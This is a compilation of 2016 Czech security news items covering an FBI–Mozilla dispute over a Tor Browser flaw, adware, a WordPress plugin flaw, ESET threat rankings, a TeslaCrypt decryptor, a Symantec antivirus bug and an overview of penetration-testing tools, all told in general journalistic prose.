Czech Articles - 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
FBI využívá ke sledování díru, která je zřejmě i ve Firefoxu. Mozilla chce chybu znát, ale neuspěla ani u soudu
27.7.2016 Zdroj: SecurityWorld Zranitelnosti
Američtí federální vyšetřovatelé z FBI objevili díru v zabezpečení internetového prohlížeče Tor Browser, díky které mohli sledovat a dopadnout uživatele serveru s dětskou pornografií. Tor Browser je však prohlížeč postavený na Firefoxu a je docela možné, že se chyba v zabezpečení týká i Firefoxu samotného. Mozilla by se proto o ní ráda dozvěděla, ale FBI odmítá objevenou chybu prozradit.
Když to nešlo běžnou domluvou, zkusila to Mozilla dokonce u soudu. Ten se však nyní postavil na stranu FBI a rozhodl, že vyšetřovatelé kýženou informaci Mozille poskytovat nemusí, informuje Computerworld.
Mozilla se opírá především o argumenty založené na tom, že pokud by se chyba týkala i Firefoxu, byla by ohrožena bezpečnost počítačů milionů uživatelů. Pokud o chybě v zabezpečení ví FBI, může o ni vědět i někdo jiný a zneužívat ji.
Zajímavý případ připomíná nedávný podobný spor Applu. Po firmě vyšetřovatelé původně chtěli, aby jim poskytla přístup k zašifrovaným datům v úložišti iPhonu kvůli vyšetřování. Požadavek byl adekvátní, ale Apple nepomohl s tím, že ze zašifrovaného telefonu nemá jak data dostat a že neexistují žádná "zadní vrátka". V FBI nakonec zabezpečení nějak pokořili. Apple chtěl pochopitelně vědět jak, protože by to mohlo znamenat bezpečnostní díru v iPhonu. Ale podobně jako Mozilla neuspěl.
Nová chyba ve Windows vás zahltí nechtěnou reklamou
8.6.2016 Zdroj: ComputerWorld Zranitelnosti
Nová verze malwaru DNS Unlocker umožňuje měnit výchozí konfiguraci DNS, díky čemuž může zasažené uživatele začít zásobovat nadměrnou reklamou.
Analytici Esetu detekovali novou verzi adwaru DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.
„DNS útoky nejsou tak destruktivní – řekněme v porovnání s ransomwarem – a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ říká Petr Šnajdr, bezpečnostní expert v Esetu.
Analytici zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti.
„V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS. Proto jde o problém, který je pro běžného uživatele velmi těžko řešitelný,“ tvrdí Šnajdr.
Základní problém prý spočívá v tom, jak systém Windows pracuje s DNS adresami. Podrobné informace o svých zjištěních proto Eset zaslal Microsoftu, který podle jeho slov uznal, že jde chybu, ale bohužel ji neklasifikoval jako potenciální zranitelnost.
"Jelikož úprava registru vyžaduje administrátorská práva, nepovažujeme tento problém za natolik nebezpečný, abychom ho řešili prostřednictvím servisu MSRC,“ odpověděli zástupci Microsoftu.
Možná preventivních opatření podle Esetu:
Nenechávejte uživatele s administrátorskými právy surfovat na internetu; pokud ano, pak pouze v nezbytných případech.
Pokud zaregistrujete nevyžádané reklamy, zejména v případě, pokud mají dole v patičce uveden původ DNS Unlocker, zkontrolujte si nastavení DNS serverů v pokročilém menu nastavení TCP/IP.
Pokud spatříte pop-up okno s nabídkou nějakého druhu podpory, buďte extrémně opatrní a před jakýmkoli dalším krokem si zkontrolujte nastavení DNS.
Pokud máte jakékoli pochybnosti o nastavení DNS, můžete odstranit podezřelé položky na kartě DNS na stránce pokročilých nastavení TCP/IP. Kontrolou počítače pomocí některých on-line skenerů lze také malware DNS Unlocker odstranit.
Dodržujte všechna základní pravidla pro bezpečné používání internetu, včetně toho, abyste používali kvalitní bezpečnostní řešení.
Výzkum: Zaměstnanci nedbají na bezpečnost
27.7.2016 Zdroj: ComputerWorld Hrozby
Dobrou zprávou je, že oproti loňsku výrazně vzrostl počet lidí, kteří k zajištění vzdáleného přístupu k datům používají bezpečné firemní nástroje. Špatnou zprávou je, že současně roste i počet lidí, kteří si stále práci domů posílají přes soukromý email.
Využívání firemního cloudu letos oproti roku 2015 výrazně vzrostlo (z 29 % na 43 %) a Česko se tak z loňských spodních příček dostalo na evropský průměr (45%). Téměř polovina (46 %) zaměstnanců si ale stále ještě posílá pracovní soubory na soukromý email, což je o 7 procentních bodů více než loni.
Využívání spotřebitelských úložišť se zdvojnásobilo (ze 14 % na 30 %). Soukromé maily ani běžná úložiště přitom nemohou zajistit potřebnou míru ochrany citlivých obchodních informací. Vyplývá to z nového ročníku průzkumu Náskok díky technologiím, který si nechal zpracovat Microsoft.
Lidé chápou nutnost dobře chránit informace, ke kterým na dálku přistupují. 9 z 10 šéfů a 79 % zaměstnanců zdůraznilo, že při práci mimo kancelář je nezbytné zajistit bezpečnost dat.
„Jenže praxe stále ještě pokulhává. Používání soukromých mailů pro sdílení pracovních dokumentů může pro firmy představovat časovanou bombu,“ uvedl Ondřej Novodvorský, ředitel pro malé a střední firmy z Microsoftu. "Do práce patří profesionální pracovní nástroje a platí to i o technologiích."
Není přitom řešním mobilitu omezovat. V letošním průzkumu uvedly téměř tři čtvrtiny (72 %) zaměstnanců českých SMB, že možnost pracovat mimo kancelář zvyšuje jejich produktivitu. Firmy by se jejím omezením připravily o důležitý zdroj výkonnosti, kreativity i nových obchodních příležitostí.
„Lidé dnes mobilně žijí a jsou zvyklí komunikovat a sdílet na dálku. Pokud firma svým zaměstnancům nenabídne bezpečné nástroje a nenaučí je správně používat, najdou si jinou cestu. A to může být pro bezpečnost firemních dat velký problém,“ řekl Ondřej Novodvorský.
Neopravená chyba ve WordPress pluginu ohrožuje tisíce webů
27.7.2016 Zdroj: ComputerWorld Zranitelnosti
Vada v zásuvném modulu Mobile Detector v oblíbeném systému pro správu obsahu umožnil hackerům nahrát škodlivá data na servery.
Během posledního týdne se útočníkům podařilo zneužít chybu, která se objevila v oblíbeném WP Mobile Detector pluginu, instalovaném na více než 10 tisíc webových stránkách.
Vývojář zásuvného modulu chybu opravil již v úterý ve verzi 3.6; uživatelé by se tak měli ujistit nejen, že mají nejnovější verzi pluginu, ale také, zda nejsou jejich stránky již napadeny.
Zneužití je možné díky skriptu zvaném resize.php a umožňuje vzdáleným útočníkům nahrávat soubory na webový server. Mezi takové soubory mohou patřit např. backdoor shell skripty, které hackerům poskytnou zadní vrátka přístupu na server a umožní jim vkládat části kódu na webové stránky.
Chybu objevil bezpečnostní systém Wordpressu PluginVulnerabilities.com poté, co sledoval requesty na soubor wp-content/plugins/wp-mobile-detector/resize.php, ačkoli ten na serveru neexistoval. To znamená, že někdo používal automatický sken, aby vyhledal tento konkrétní soubor, což obvykle bývá právě z důvodu možné zneužitelné chyby.
Výzkumníci z bezpečnostní agentury Sucuri, specializované na webové zabezpečení, analyzovali logy z firewallu společnosti a nalezli několik pokusů o zneužití chyby, začínaje 27. květnem; tedy čtyři dny před vydáním opravné aktualizace. Je však možné, že útočníci o vadě věděli již dříve.
WP Mobile Detector (pozor na záměnu s jiným, nenakaženým pluginem jménem WP Mobile Detect) měl na počátku května přes 10 tisíc aktivních instalací. Nyní se toto číslo smrsklo na pouhou pětinu, ale z části je to i proto, že po detekci chyby WordPress zásuvný modul na čas odstranil.
Aby útočníci mohli vadu v resize.php zneužít, musí server mít povolenu funkci allow_url_fopen. To do jisté míry limituje nebezpečnost závady.
Protože není jasné, kolik webových stránek bylo nakaženo, je dobrý nápad, jste-li uživatelem dané aplikace, zkontrolovat svůj server.
„Valná většina zranitelných stránek je nyní infikována spamem skrze doorway weby, odkazujících obvykle na pornostránky,” popisuje výzkumník ze Sucuri Douglas Santos. „Standardně najdete složku gopni3g v kořenovém adresáři, která obsahuje soubor story.php (která doorwaye umožňuje), .htaccess a podsložky se spam soubory a šablonami.”
Flowmon nabídne monitoring sítě i přes mobil
27.7.2016 Zdroj: ComputerWorld Mobilní
Flowmon Friday – to je název akce, v rámci které firma Flowmon Networks koncem května seznámila veřejnost s novými řešeními zaměřenými na monitorování a bezpečnost počítačových sítí. Partnerem konference baly IDG Czech Republic.
Během programu se návštěvníci mohli seznámit s novinkami v řešení Flowmon, jako je například nová architektura ukládání datových toků, větší viditelnost do aplikační vrstvy nebo rychlejší detekce incidentů, a vývojem technologie monitorování síťového provozu.
Vedle toho Pavel Minařík, technický ředitel Flowmon Networks, představil zbrusu novou mobilní aplikaci pro operační systémy iOS a Android. Díky ní mají uživatelé Flowmonu přehled o své síti kdekoliv a kdykoliv na svém mobilním zařízení.
Z řad technologických partnerů vystoupil na konferenci Jaromír Pilař z Cisco Systems, který se věnoval síťové infrastruktuře jako klíčovému prostředku pro detekci a kontrolu hrozeb.
Praktická nasazení a přínosy řešení Flowmon napříč různými segmenty pak postupně představili Miloš Němec z Kofoly, Aneta Coufalíková z Centra CIRC Ministerstva obrany, Daniel Dvořák z Vysoké školy chemicko-technologické v Praze a Filip Višenka ze Slovenské spořitelny.
Na konferenci byli také vyhlášeni nejúspěšnější partneři společnosti za rok 2015. Titul českého Distributora roku si odnesl Veracomp, partnerem roku pak společnost Dimension Data. Obě ocenění předal Zoltán Csecsödi, nový obchodní ředitel Flowmonu pro Českou republiku, jenž byl na konferenci oficiálně ve funkci představen.
„Příští rok to bude deset let existence Flowmonu. Z malého týmu se nám podařilo vytvořit úspěšnou společnost, které se daří růst u nás i v zahraničí,“ dodal Rostislav Vocilka, ředitel společnosti Flowmon Networks.
Mobilní platby: Zabezpečí vás při nich lépe hardware, nebo software?
27.7.2016 Zdroj: ComputerWorld Mobilní
Platební systémy se stále častěji dostávají do hledáčku obchodníků i uživatelů. Je ale jejich používání opravdu bezpečné? A které řešení se ukazuje jako vhodnější?
Google oznámil svou platformu Android Pay a jedná s operátory o předinstalaci tohoto systému do telefonů se systémem Android. Samsung zase o prázdninách v Evropě zprovoznil svůj vlastní platební systém Samsung Pay, PayPal se oddělil od firmy eBay a koupil dodavatele platební technologie, firmu Xoom.
Pro spotřebitele se rozhodnutí pravděpodobně zredukuje na to, zda mít telefon iPhone nebo Android a jaké aplikace je snadnější používat a jsou akceptované většinou obchodníků.
Obchodníci pokračují v implementacích podpory pro mobilní platby. Naštěstí se nebudou muset rozhodovat mezi podporou platforem Apple a Google – přidání podpory pro jednu automaticky znamená schopnost akceptovat druhou.
Ale co používané back-endové technologie? Jak na tom jsou z hlediska bezpečnosti? Podle bezpečnostních expertů existuje několik způsobů realizace a každý má své vlastní bezpečnostní důsledky.
Hardware versus software
Hlavním rozdílem mezi platformou Apple Pay a většinou ostatních mobilních platebních platforem je, že Apple Pay používá hardwarové zabezpečení a bezpečnostní prvek uvnitř telefonu, chráněný proti neoprávněné manipulaci.
V telefonech iPhone se pro další zabezpečení používá kombinace se čtečkou otisků prstů.
Podle Adama Kujawy, šéfa antimalwaru ve společnosti Malwarebytes, se nepřenášejí žádné nešifrované osobní údaje. Jediné dosud ohlášené bezpečnostní problémy se týkají úvodního nastavení, kdy podvodníci dokázali přesvědčit operátory k přiřazení ukradených platebních karet ke svým telefonům iPhone.
Zloději by navíc teoreticky mohli dokázat oklamat čtečky otisků prstů a uskutečnit neoprávněné platby, uvádí Kujawa. Největší nevýhody platformy ApplePay však podle něj nejsou technické, ale spíše praktické.
Tyto telefony jsou totiž relativně drahé a neexistuje žádný způsob placení v případě, když například dojde k vybití baterie iPhonu.
Hlavní alternativou pro bezpečnostní prvek je HCE (Host Card Emulation – hostitelská emulace karty, kterou v tuzemsku nyní začíná jako prý první lokální banka provozovat Komerční banka). Je to softwarová alternativa k hardwarově založenému zabezpečení a používá cloudový tokenizační proces.
„Z bezpečnostního hlediska poskytuje HCE nejlepší ochranu, protože šifrování a předávání vašich finančních informací je v rukách příslušné banky a neexistuje spojení mezi platebními informacemi a samotným zařízením v případě, že dojde k jeho krádeži,“ tvrdí Kujawa.
Existuje zde však riziko, že by mohly speciálně vytvořené škodlivé aplikace unést proces HCE a ukrást uživatelům peníze.
Ideální kombinací by podle Kujawy byl bezpečný prvek v zařízení v kombinaci s HCE a biometrickou autentizací.
Mobilní telefony versus web
Přes všechny diskuze týkající se ApplePay a toho, co Google a Samsung mohou nebo nemohou dělat, nemá většina uskutečněných mobilních plateb se žádnou z těchto technologií nic společného.
Namísto toho jsou webové platby vykonané jednoduše prostřednictvím prohlížečů v mobilních zařízeních nebo specializovaných aplikacích. Například Amazon má nákupní aplikaci pro chytré telefony či tablety a PayPal disponuje mobilní aplikací, která vám umožní poslat peníze přátelům.
Podle platební společnosti Adyen tyto dva druhy mobilních plateb tvoří 27 procent všech on-line plateb v prvním čtvrtletí letošního roku, což je nárůst o 39 procent ve srovnání se stejným obdobím loňského roku.
Malá část těchto mobilních plateb se týká lokálních nákupů – například tak můžete platit v kavárnách Starbucks a za svou jízdu s využitím služby Uber pomocí jejich aplikací.
Tyto osobní mobilní platby vytvořily podle agentury Forrester Research jen v USA obrat 3,74 miliardy dolarů. Forrester však očekává, že porostou rychleji než další druhy mobilních plateb a do roku 2019 dosáhnou 34,2 miliardy dolarů.
S ohledem na bezpečnost je nevýhodou tohoto přístupu totéž co u jakéhokoli webového platebního systému, popisuje Andrew Blaich, bezpečnostní analytik ve společnosti BlueBox Security. Pokud by došlo k úniku dat, mohli by počítačoví zločinci potenciálně ukrást všechny uložené finanční informace o uživatelích.
„Pokud někdo ukradne vaše uživatelské jméno a heslo, může se za vás vydávat a vaším jménem i platit,“ upozorňuje Blaich.
Kromě toho může dojít ke kompromitaci samotných mobilních aplikací, popisuje Andrew McLennan, viceprezident společnosti Metaforic, která se zaměřuje na mobilní bezpečnost. To se již stalo oběma aplikacím – Starbucks i Uber.
Hackeři mohou stáhnout aplikace, udělat root zařízení, v případě potřeby vypnout bezdrátovou konektivitu a poté vynaložit veškerý potřebný čas k analýze aplikací.
„Jakmile to dokončí, mohou na základě získaných informací vytvořit zbraně pro hromadné útoky – od jednoduchých krádeží po zákeřnější sbírání osobních dat pro budoucí použití daleko od původní aplikace,“ varuje McLennan.
Nástroje pro penetrační testování: Vyberete si?
27.7.2016 Zdroj: ComputerWorld Zabezpečení
Pokud nemáte žádné obavy, že by vaše IT vybavení mohli napadnout zahraniční či místní útočníci, je pro vás tento článek zbytečný. Pokud však žijete ve stejné realitě jako zbytek z nás, mohou vám rady od skutečného profesionála, týkající se solidních nástrojů pro preventivní penetrační testování, velmi pomoci.
Evan Saez, který je nadšencem, návrhářem a programátorem penetračního testovacího nástroje a pracuje jako analytik kybernetických hrozeb ve společnosti Lifars, promluvil o nejnovějších a nejlepších penetračních nástrojích a o vhodném způsobu jejich použití. Tady jsou jeho postřehy.
Dostupné nástroje pro penetrační testování
Nástroje pro penetrační testování, o kterých se zde bude mluvit, zahrnují Metasploit, Nessus Vulnerability Scanner, Nmap, Burp Suite, Owasp ZAP, SQLmap, Kali Linux a Jawfish (Evan Saez je vývojářem projektu Jawfish).
Tyto nástroje jsou klíčem k zabezpečení podniku, protože jsou to ty samé produkty, které používají útočníci. Pokud nenajdete své díry a neopravíte je, najdou je oni.
Metasploit je framework s větší základnou programátorských fanoušků, který se rozšiřuje o vlastní moduly fungující jako testovací nástroje k otestování slabin v operačních systémech a aplikacích.
Lidé vydávají tyto vlastní moduly na serverech GitHub a Bitbucket. Bitbucket je stejně jako GitHub on-line repozitářem pro programátorské projekty.
„Metasploit je zřejmě nejpopulárnějším řešením svého druhu pro penetrační testování,“ uvádí Saez.
Nessus Vulnerability Scanner je na signaturách založený nástroj pro vyhledávání zranitelností. „Nessus dokáže pouze porovnávat výsledky skenování s databází známých signatur zranitelností,“ popisuje Saez.
Síťový skener Nmap umožňuje penetračním testérům zjistit typy počítačů, serverů a hardwaru, které má podnik ve své síti.
Skutečnost, že jsou tyto stroje identifikovatelné prostřednictvím těchto externích sond, je sama o sobě zranitelností. Útočníci používají tyto informace k vytvoření základů pro útoky.
Burp Suite je dalším oblíbeným nástrojem pro penetrační testování, určeným pro webové aplikace. Mapuje a analyzuje webové aplikace, vyhledává a umí zneužít zranitelnosti, jak uvádí společnost PortSwigger, která je dodavatelem nástroje Burp Suite pro zabezpečení webu.
Owasp ZAP (Zed Attack Proxy) je řešení pro penetrační testování webových aplikací od neziskového projektu Owasp (Open Web Application Security Project). Nabízí automatizované a manuální skenování webových aplikací, jehož účelem je pomoci nováčkům i zkušeným profesionálním penetračním testérům. ZAP je open source systém dostupný na webu GitHub.
SQLmap automatizuje odhalování děr typu SQL Injection. Ty se potom snaží zneužít a získat úplnou kontrolu nad databázemi a hostujícími servery.
Kali Linux představuje komplexní nástroj obsahující předinstalovanou sadu specializovaných penetračních testovacích (a bezpečnostních a forenzních) nástrojů. „Obsahuje nástroje použitelné pro lidi, kteří nemají v oblasti bezpečnosti žádné znalosti,“ popisuje Saez.
Jawfish je na rozdíl od většiny nástrojů založených na signaturách řešením, které využívá genetické algoritmy. „Genetické algoritmy hledají věci v kontextu vyhledávání,“ vysvětluje Saez.
Na základě vyhledávacích kritérií, jak se Jawfish dostává blíže k tomu, co se hledá (v tomto případě zranitelnost), nakonec nějakou může najít. Jawfish nevyžaduje databázi signatur.
Jak je používat
Metasploit, Nessus Vulnerability Scanner, Nmap, Burp Suite, Owasp ZAP, SQLmap, Kali Linux a Jawfish mají své specifické využití. Většina podniků tak bude potřebovat více nástrojů.
Metasploit nabízí jak rozhraní Ruby, tak i příkazový řádek, takže si váš penetrační testér může vybrat libovolné z nich v závislosti na tom, co právě chcete dělat.
„Rozhraní Ruby je vhodnější pro testování velmi rozsáhlé sítě, protože spouštění příkazů z příkazového řádku by bylo příliš zdlouhavé,“ vysvětluje Saez.
Nessus Vulnerability Scanner hledá otevřené porty v počítačích a firewallech a instalace potenciálně zranitelného softwaru. „Pokud jde o penetrační testování, je tento nástroj méně užitečný, protože je příliš nápadný a při zjišťování zranitelností jde tzv. předními dveřmi a komunikuje s operačním systémem.
Toto řešení se obvykle používá při kontrole dodržování předpisů ke zjišťování, zda jsou nainstalované všechny záplaty,“ vysvětluje Garrett Payer, vedoucí technolog v konzultační a implementátorské společnosti ICF International.
Nmap je dobré používat k vyhledávání hostitelů, otevřených portů, verzí softwaru, operačních systémů, verzí hardwaru a zranitelností – obecně k mapování terénu pro síťový útok.
Je užitečný v každé fázi penetračního testování, kdykoli máte novou sadu hostitelů, portů a dalších prostředků, které je potřebné identifikovat, například při zadávání nového segmentu sítě.
„Tento systém nabízí funkci skriptování a je užitečný pro výčet uživatelského přístupu,“ dodává Payer.
K mapování webových aplikací používejte Burp Suite a webový prohlížeč. Nástroje uvnitř sady Burp Suite zjišťují funkcionalitu aplikací a bezpečnostní díry a potom zahájí vlastní útoky.
Burp Suite automatizuje opakované funkce, a přitom uživateli ponechává volbu pro případy, kdy penetrační testér potřebuje kontrolu nad jednotlivými možnostmi testování.
„Tento funkcemi nabitý nástroj zkoumá skriptování mezi weby a další zranitelnosti pomocí proxy,“ popisuje Payer. „Přináší to transparentnost toho, co webové stránky vlastně posílají na server.“
Owasp ZAP vykonává různá skenování a testy včetně skenování portů, skenování hrubou silou a fuzzingu za účelem nalezení nezabezpečeného kódu. Penetrační testéři používají intuitivní grafické uživatelské rozhraní podobné aplikacím Microsoftu a některé nástroje pro design webu (jako je například Arachnophilia).
Poté, co začnete surfovat a uděláte na webu potřebné úkony, znovu použijete ZAP a můžete vidět kód a co se stalo při těchto činnostech. Owasp ZAP nastavíte jako proxy server a začne kontrolovat webový provoz, který zpracovává.
„Tento nástroj je novější než Burp Suite, nemá tolik funkcí, ale je zdarma jako open source. Poskytuje podmnožinu funkcí a grafické uživatelské rozhraní, které je užitečné pro lidi, kteří s penetračním testováním webových aplikací teprve začínají,“ uvádí Payer.
Řešení SQLmap se používá pomocí příkazů Pythonu na příkazové řádce k testování nesprávně naprogramovaných webových stránek a adres URL spojených s databázemi. Pokud škodlivě vytvořený odkaz (URL) do databáze vyvolá chybu, potom je takový odkaz předmětem útoku.
SQLmap se instaluje do operačního systému Ubuntu Linux ve virtuálním stroji. „SQLmap je vhodný pro skriptování. Umí zjistit takové věci, jako například zda programátor parametrizoval vstupy,“ uvádí Payer.
Pokud ne, mohou penetrační testér či útočník odeslat jméno, středník a SQL příkaz a spustit ho v databázi a získat kontrolu, vysvětluje Payer.
Nainstalujte si Kali Linux a spusťte libovolný z desítek integrovaných nástrojů pro penetrační testy a útoky. „Kali Linux je k dispozici s velkým množstvím uživatelské dokumentace,“ uvádí Saez.
Penetrační testovací řešení Jawfish můžete zkusit použít pomocí dostupného formuláře grafického uživatelského rozhraní. Jednoduše zadejte IP adresu serveru, zranitelnou webovou adresu na této IP adrese, zranitelnost, metodu a cílový text.
Na náš trh míří další „superbezpečný“ telefon
27.7.2016 Zdroj: ComputerWorld Mobilní
GranitePhone, podle dodavatele vysoce zabezpečený mobilní telefon, uvedla na náš trh firma Satomar. Novinka zahrnuje systém Sikur, jenž běží nad Androidem a zajišťuje několikanásobné šifrování přenášených informací.
GranitePhone hardwarově představuje běžný mobilní telefon s podporou LTE, který je však vybaven speciálním operačním prostředím. Jako základ slouží upravený systém Android 5.1, na kterém běží prostředí Sikur OS.
Ten umožňuje komunikaci s jakýmkoli jiným telefonem, mobilním zařízením či počítačem stejně, jako každý jiný mobil. Jakmile však dojde k výměně informací mezi dvěma GranitePhony nebo mezi GranitePhonem a jiným přístrojem s řešením Sikur, posílaná data a hovory se vícenásobně šifrují.
Kromě použití šifrování AES s délkou klíče 256 bitů je použit také kódovací algoritmus RSA s délkou klíče 2 048 či 4 096 bitů a další hashovací funkce. Díky tomu jsou šifrovací procesy v různých úrovních komunikace podle výrobce zdvojnásobené až ztrojnásobené.
GranitePhone kvůli svému zaměření za ochranu uživatelů neumožnuje instalaci aplikací z obchodu Google Play. Obchod s aplikacemi totiž není vůbec součástí systému, který tak obsahuje pouze základní aplikace pro telefonování, e-mailovou komunikaci, SMS, webový prohlížeč, kalkulačku a speciální zabezpečený chat.
Dodavatel chystá přidat ještě mapy s navigací, hodiny, poznámky a kalendář, v další vlně pak prý i některé další aplikace.
Sikur je k dispozici pro Android od verze 4.0, iOS od verze 7.0 a také pro počítače s Windows. Po uplynutí 30denni zkušební verze je k dispozici ve dvou variantách.
Essential zajišťuje základní funkce zabezpečené skupinové komunikace s tím, že počet odeslaných šifrovaných zpráv je omezen na 15 měsíčně, stejně tak jako počet šifrovaných hovorů. Tato varianta je k dispozici za cenu 350 Kč, resp. 13 € měsíčně. Verzi Enterprice bez jakýchkoli omezení objemu šifrované komunikace je možné využívat za 490 Kč, resp. 18,5 € měsíčně.
Samotný přístroj GranitePhone se systémem Sikur je k dostání za cenu 29 990 Kč, resp. 1 110 eur včetně DPH.
Zašifrovaní ransomwarem TeslaCrypt? Eset prý dokáže data zase zpřístupnit
27.7.2016 Zdroj: ComputerWorld Viry
Nástroj, který dokáže obnovit soubory zašifrované pomocí ransomwaru TeslaCrypt, uveřejnil Eset. Dokáže to ale jen u novějších verzí TeslaCrypt 3 nebo 4. Novinka je ke stažení na webových stránkách dodavatele.
Operátoři ransomwaru TeslaCrypt nedávno ohlásili, že ukončují své škodlivé aktivity. Při této příležitosti jeden z analytiků Esetu anonymně kontaktoval útočníky přes kanál určený obětem TeslaCrypt a požádal jej o univerzální dešifrovací klíč (tzv. master key).
Žádost byla překvapivě kladně vyřízená, což umožnilo Esetu vytvořit řešení pro ty, kteří ztratili přístup ke svým souborům.
TeslaCrypt se poprvé objevil na scéně začátkem roku 2015 a začal se soustředit na obsah spojený s hrami, jako jsou například uložené pozice, uživatelské mapy, ale i na osobní dokumenty a obrázky – celkem šlo o 185 různých koncovek souborů.
Nástroj Esetu dokáže dešifrovat soubory zakódované TeslaCryptem s koncovkou .xxx, .ttt, .micro nebo .mp3, a samozřejmě i ty, jejich koncovka se šifrováním nezměnila.
Jaké jsou aktuálně nejčastější hrozby v Česku?
27.7.2016 Zdroj: ComputerWorld Hrozby
Globálně nejvíce zlobí červ Bundpil, v Česku se ale momentálně nejčastěji šíří infikované přílohy e-mailu.
Žebříček deseti největších bezpečnostních hrozeb v IT za měsíc duben zveřejnil Eset. Podle něj oproti březnu výrazně stouplo rozšíření škodlivého červa Bundpil, který se šíří prostřednictvím vyměnitelných médií. Druhou nejčastější hrozbu představuje trojan Nemucod, třetí je potom Javascript Danger.ScriptAttachment. Ten je ve světovém měřítku třetí, v České republice se jedná o hrozbu nejčastější.
„Červ Bundpil obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ popisuje Petr Šnajdr, expert Esetu.
Bundpil předstihl trojského koně Nemucod. I ten však nadále zaznamenával zvýšený výskyt a v žebříčku deseti největších kybernetických hrozeb za měsíc duben se posunul na druhé místo.
Nemucod používají hackeři jako prostředek pro instalaci dalších škodlivých kódů a ovládnutí infikovaného zařízení. „Jde o klasický downloader, který se šíří jako příloha e-mailových zpráv. Nejčastěji se maskuje jako faktura nebo pozvánka k soudu,“ konstatuje Šnajdr.
Nově se v desítce nejaktivnějších škodlivých kódů objevuje na třetí pozici JS/Danger.ScriptAttachment, což je škodlivý soubor, který se šíří jako příloha e-mailu a může způsobit stažení malware. „Jde o detekci, která podle obecnějších kritérií posuzuje škodlivost zprávy. Detekce JS/Danger pokrývá jiným algoritmem varianty škodlivého kódu Nemucod, a proto je část Nemucodu detekována jako JS/Danger. V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětluje Šnajdr.
Aktuálně se v přehledu nejčastějších kybernetických hrozeb objevuje i vir Agent.XWT, který otevírá vrátka dalším infiltracím. Nejrozšířenější hrozby v první pětici uzavírá kód ScrInject, který otevírá webové HTML stránky se škodlivými skripty nebo vloženými iframe objekty, které automaticky přesměrovávají zařízení ke stažení malware.
Druhá polovina žebříčku nejaktivnějších virů už neobsahuje tak rozšířené škodlivé kódy. Na šestou pozici se v dubnu posunul trojan HTML/Refresh, který přesměrovává internetový prohlížeč na nepříliš důvěryhodná URL. Sedmou pozici si stejně jako v březnu udržel virus Rammit, který se aktivuje při každém spuštění systému a jeho pomocí může útočník na dálku vypnout nebo restartovat napadený počítač.
Na osmou pozici z březnové třetí příčky v dubnu klesl malware Agent.CR, který ke svému maskování používá soubor typu LNK a v rámci něho zneužívá ke svým aktivitám systémový program rundll32.exe.
Devátou příčku pak obsadil polymorfní virus Sality, který při každém restartu operačního systému narušuje nebo odstraňuje bezpečnostní aplikace.
Dubnový žebříček nejrozšířenějších kybernetických hrozeb uzavírá malware Agent.BZ, který podobně jako Agent.CR využívá volání škodlivé funkce ze své DLL knihovny pomocí runddl32.exe.
Top 10 hrozeb - globální přehled
Win32/Bundpil
JS/TrojanDownloader.Nemucod
JS/Danger.ScriptAttachment
Win32/Agent.XWT
HTML/ScrInject
HTML/Refresh
Win32/Ramnit
LNK/Agent.CR
Win32/Sality
LNK/Agent.BZ
Top 10 hrozeb - Česká republika
JS/Danger.ScriptAttachment
JS/TrojanDownloader.Nemucod
HTML/Refresh
VBA/TrojanDownloader.Agent.BBD
Win32/Bayrob
JS/Exploit.Agent.NLV
HTML/IFrame
Win32/PSW.Fareit
Win32/PSW.Papras
VBS/TrojanDownloader.Small.NEN
Kritická chyba v antivirech Symantec a Norton umožňuje atak hackerů
27.7.2016 Zdroj: ComputerWorld Zranitelnosti
Chyba v jádru antiviru, užívaném hned v několika produktech firmy Symantec, je velmi snadno zneužitelná. Podle bezpečnostního technika Googlu, Tavise Ormandyho, který chybu objevil, může být zranitelnost zneužitá ke spuštění nakaženého kódu na počítačích, a to i vzdáleně.
Jediné, co útočník musí udělat, je poslat e-mail s vadným souborem jako přílohu nebo přesvědčit uživatele, aby klikl na nebezpečný odkaz.
Samotné spuštění souboru již není třeba: Jádro antiviru používá ovladač k zachycení všech systémových operací a automaticky soubor „projede“ ve chvíli, kdy jakkoli pronikne do systému.
Již v pondělí firma chybu opravila v Anti-Virus Engine (AVE) aktualizaci verze 20151.1.1.4 skrze službu LiveUpdate. Bezpečnostní vadou je přetečení bufferu, které mohlo nastat během parsování spustitelných souborů s vadným záhlavím.
Přípona souboru nehraje roli, má-li záhlaví označující jej jako přenosný spustitelný soubor, zapackovaný pomocí ASPacku, komerčního kompresního softwaru.
Zdaleka nejhorší zprávou však je, že Symantec AVE takové soubory rozbaluje uvnitř kernelu, tedy přímo v jádru operačního systému, oblasti s nejvyššími pravomocemi. To znamená, že úspěšné nakažení systému může vést ke kompletní ztrátě moci nad celým systémem.
„Na Linuxu, Macu a dalších unixových platformách může tento proces způsobit vzdálené přetečení heapu (haldy) v procesech Symantecu nebo Nortonu,“ vysvětluje Ormandy v článku k tématu. „Ve Windows tento proces vede k přetečení paměti přidělené kernelu, jak je sken jádra v kernelu postupně načítán, což z toho činí vzdálenou zranitelnost ring0 memory corruption – o moc horší už to být nemůže.“
Symantec zranitelnost ohodnotil na škále CVSS na 9,1 z 10 maximálních, tedy jako extrémně nebezpečnou.
„Nejčastější ukazatel úspěšného útoku by bylo okamžité selhání systému, tedy modrá obrazovka smrti ,“ popsala společnost v článku.
Uživatelé by se měli ujistit, že nainstalovali nejnovější možné aktualizace, dostupné pro jejich Symantec antivirové produkty.
Jde o nejnovější z dlouhé řady kritických chyb nalezených Ormandym a jinými bezpečnostními analytiky v antivirových produktech z posledních let. Většina z nich nepřestává výrobce antivirů kritizovat za jejich tendenci pokračovat s nebezpečnými skeny souborů, které v minulosti vedly ke zneužití chyb pomocí získaných pravomocí kernelu.
Poznejte zaměstnance, kteří vám chtějí škodit
